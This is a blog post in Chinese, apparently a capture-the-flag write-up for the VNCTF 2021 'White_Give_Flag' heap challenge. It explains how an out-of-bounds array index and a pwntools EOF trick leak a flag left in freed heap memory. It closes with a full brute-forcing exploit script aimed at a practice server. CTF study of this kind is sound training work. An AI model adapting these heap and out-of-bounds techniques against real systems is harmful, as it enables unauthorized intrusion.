<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="https://www.hualigs.cn/image/6015799666530.jpg">
  <link rel="icon" type="image/png" sizes="32x32" href="https://www.hualigs.cn/image/6015799666530.jpg">
  <link rel="icon" type="image/png" sizes="16x16" href="https://www.hualigs.cn/image/6015799666530.jpg">
  <link rel="mask-icon" href="https://www.hualigs.cn/image/6015799666530.jpg" color="#222">
  <link rel="manifest" href="https://www.hualigs.cn/image/6015799666530.jpg">
  <meta name="msapplication-config" content="https://www.hualigs.cn/image/6015799666530.jpg">

<link rel="stylesheet" href="/diazang/css/main.css">


<link rel="stylesheet" href="/diazang/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"jue-xian.gitee.io","root":"/diazang/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="题目： [[VNCTF 2021]White_Give_Flag]: https:&#x2F;&#x2F;buuoj.cn&#x2F;challenges#VNCTF%202021White_Give_Flag    “vn” 该题目为VN招新题目，属于一道比较简单的堆和数组的混搭运用">
<meta property="og:type" content="article">
<meta property="og:title" content="vn招新">
<meta property="og:url" content="https://jue-xian.gitee.io/diazang/2021/03/25/vn%E6%8B%9B%E6%96%B0/index.html">
<meta property="og:site_name" content="RUBIA">
<meta property="og:description" content="题目： [[VNCTF 2021]White_Give_Flag]: https:&#x2F;&#x2F;buuoj.cn&#x2F;challenges#VNCTF%202021White_Give_Flag    “vn” 该题目为VN招新题目，属于一道比较简单的堆和数组的混搭运用">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2021/03/25/iFsybXmnZLcp3vu.png">
<meta property="og:image" content="https://i.loli.net/2021/03/25/y9BlhoFv1f6JbdZ.png">
<meta property="og:image" content="https://i.loli.net/2021/03/25/5bxAYL81vMZyaOU.png">
<meta property="og:image" content="https://i.loli.net/2021/03/25/uTRyCw6nbIzdlWZ.png">
<meta property="og:image" content="https://i.loli.net/2021/03/25/4mXbGZ8ux2gnELe.png">
<meta property="og:image" content="https://i.loli.net/2021/03/25/yFmqhenZvoPCLOD.png">
<meta property="article:published_time" content="2021-03-24T16:31:23.000Z">
<meta property="article:modified_time" content="2021-03-25T04:40:28.585Z">
<meta property="article:author" content="H.R.P">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/03/25/iFsybXmnZLcp3vu.png">

<link rel="canonical" href="https://jue-xian.gitee.io/diazang/2021/03/25/vn%E6%8B%9B%E6%96%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>vn招新 | RUBIA</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/diazang/atom.xml" title="RUBIA" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/diazang/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">RUBIA</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/diazang/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/diazang/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/diazang/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/diazang/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/diazang/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/diazang/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>日程表</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/diazang/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>站点地图</a>

  </li>
        <li class="menu-item menu-item-commonweal">

    <a href="/diazang/404/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>公益 404</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://jue-xian.gitee.io/diazang/2021/03/25/vn%E6%8B%9B%E6%96%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://www.hualigs.cn/image/6015786be4309.jpg">
      <meta itemprop="name" content="H.R.P">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="RUBIA">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          vn招新
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-03-25 00:31:23 / 修改时间：12:40:28" itemprop="dateCreated datePublished" datetime="2021-03-25T00:31:23+08:00">2021-03-25</time>
            </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/diazang/2021/03/25/vn%E6%8B%9B%E6%96%B0/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/diazang/2021/03/25/vn%E6%8B%9B%E6%96%B0/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>题目：</p>
<p>[[VNCTF 2021]White_Give_Flag]: <a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#VNCTF%202021White_Give_Flag">https://buuoj.cn/challenges#VNCTF%202021White_Give_Flag</a>    “vn”</p>
<p>该题目为VN招新题目，属于一道比较简单的堆和数组的混搭运用</p>
<a id="more"></a>

<p>先看主函数</p>
<p>经典菜单题目</p>
<p>1.create 2.show 3.del 4.edit 5.exit</p>
<p>我们先去初始化函数看看</p>
<p><img src="https://i.loli.net/2021/03/25/iFsybXmnZLcp3vu.png" alt="1.png"></p>
<p>该函数主要的这部分，给s变量malloc个堆空间，然后对s进行初始化设定又free了</p>
<p>接着又对其进行随机空间大小的开辟范围在0x300到0x500</p>
<p>然后读入flag</p>
<p><img src="https://i.loli.net/2021/03/25/y9BlhoFv1f6JbdZ.png" alt="2.png"></p>
<p>这里我们用gdb调试下，我在本地创建了个flag文件，看看s被free后里面的内容是否还在</p>
<p>结果很明显，free后不影响其中的内容。因此我们要想办法去leak其中的内容</p>
<p><img src="https://i.loli.net/2021/03/25/5bxAYL81vMZyaOU.png" alt="4.png"></p>
<p>接着我们看看create函数</p>
<p>最大可创建4个堆，堆的编号分别是0 1 2 3 </p>
<p><img src="https://i.loli.net/2021/03/25/uTRyCw6nbIzdlWZ.png" alt="5.jpg"></p>
<p>经过查看汇编指令我们不难发现hint数组的hint[-1]=chunk[3]</p>
<p>那么现在的问题就是怎么才能让hint[]越界到hint[-1]</p>
<p>刚才我们主函数可以看见关于hint变量的下标获取函数，（篇幅有限不上图了）</p>
<p>里面有read读取，关于read的解释如图（转载于sKye231）</p>
<p>因此我们可以利用pwntools发送EOF</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">P=remote(<span class="string">&#x27;xxxxxx&#x27;</span>,xxx)</span><br><span class="line"></span><br><span class="line">p.shutdown_raw(<span class="string">&#x27;send&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/03/25/4mXbGZ8ux2gnELe.png" alt="6.png"></p>
<p><img src="https://i.loli.net/2021/03/25/yFmqhenZvoPCLOD.png" alt="7.png"></p>
<p>接着对chunk[3]传入16个任意字符用来填充，就会自己打印出flag</p>
<p>但是存放flag的堆块大小是随机的，只有chunk[3]和存放堆块大小一样才会打印flag</p>
<p>所以我们要进行爆破操作</p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">menu</span>(<span class="params">choice</span>):</span></span><br><span class="line">    p.recvuntil(<span class="string">&#x27;choice:&#x27;</span>)</span><br><span class="line">    p.send(<span class="string">&#x27;1&#x27;</span>*choice)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size</span>):</span></span><br><span class="line">    menu(<span class="number">1</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;size:\n&#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(size))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,data</span>):</span></span><br><span class="line">    menu(<span class="number">4</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;index:\n&#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Content:\n&#x27;</span>)</span><br><span class="line">    p.send(data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    <span class="comment">#p = process(&quot;./bai&quot;)</span></span><br><span class="line">    p = remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">39123</span>)</span><br><span class="line">    add(<span class="number">0x10</span>)</span><br><span class="line">    add(<span class="number">0x10</span>)</span><br><span class="line">    add(<span class="number">0x10</span>)</span><br><span class="line">    add(<span class="number">0x310</span>)</span><br><span class="line">    edit(<span class="number">3</span>,<span class="string">&#x27;x&#x27;</span>*<span class="number">0x10</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;choice:&#x27;</span>)</span><br><span class="line">    p.shutdown_raw(<span class="string">&#x27;send&#x27;</span>)</span><br><span class="line">    flag = p.recvline()</span><br><span class="line">    log.info(flag)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&#x27;flag&#x27;</span> <span class="keyword">in</span> flag:</span><br><span class="line">        exit(<span class="number">0</span>)</span><br><span class="line">    p.close()</span><br><span class="line">    sleep(<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/diazang/2021/03/15/double-attack-unsortedbin/" rel="prev" title="doublefree_attack_unsortedbin">
      <i class="fa fa-chevron-left"></i> doublefree_attack_unsortedbin
    </a></div>
      <div class="post-nav-item">
    <a href="/diazang/2021/03/25/nep%E6%8B%9B%E6%96%B0/" rel="next" title="nep招新">
      nep招新 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="H.R.P"
      src="https://www.hualigs.cn/image/6015786be4309.jpg">
  <p class="site-author-name" itemprop="name">H.R.P</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/diazang/archives/">
        
          <span class="site-state-item-count">38</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        <!-- 用下面的符号注释，注释代码用下面括号括起来 -->
<!-- -->

<!-- 







-->


        








      </div>
    </footer>
  </div>

  
  <script src="/diazang/lib/anime.min.js"></script>
  <script src="/diazang/lib/velocity/velocity.min.js"></script>
  <script src="/diazang/lib/velocity/velocity.ui.min.js"></script>

<script src="/diazang/js/utils.js"></script>

<script src="/diazang/js/motion.js"></script>


<script src="/diazang/js/schemes/pisces.js"></script>


<script src="/diazang/js/next-boot.js"></script>




  




  
<script src="/diazang/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'g8R6OK66Q2xJiQieSaxzFqVA-gzGzoHsz',
      appKey     : 'V9mmkUCmucvukcz6LwkONqXa',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
<a href="http://jue-xian.gitee.io/diazang"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#70B7FD; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
<!-- 动态背景 -->
<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>


